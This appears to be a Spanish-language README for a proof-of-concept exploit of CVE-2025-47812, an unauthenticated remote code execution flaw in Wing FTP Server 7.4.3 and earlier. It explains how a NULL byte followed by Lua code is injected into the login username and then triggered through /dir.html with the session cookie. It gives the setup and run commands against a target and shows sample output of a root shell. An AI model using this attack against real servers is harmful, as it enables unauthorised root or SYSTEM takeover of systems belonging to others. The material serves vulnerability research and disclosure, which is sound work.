
Prueba de concepto del exploit para CVE-2025-47812: ejecución remota de código no autenticada en Wing FTP Server <= 7.4.3 mediante inyección de byte NULL en el parámetro de nombre de usuario, que proporciona acceso a shell root/SYSTEM.
Vulnerabilidad de ejecución remota de código no autenticada en Wing FTP Server <= 7.4.3. Un byte NULL inyectado en el parámetro
usernamedurante el inicio de sesión provoca que se escriba código Lua en el archivo de sesión. Cuando se accede a/dir.htmlcon la cookie de sesión resultante, el código inyectado se ejecuta — como root en Linux o SYSTEM en Windows.
/loginok.html inyecta un byte NULL seguido de código Lua en el campo username./dir.html con la cookie UID devuelta desencadena la ejecución del código Lua inyectado.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
Ejemplo:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root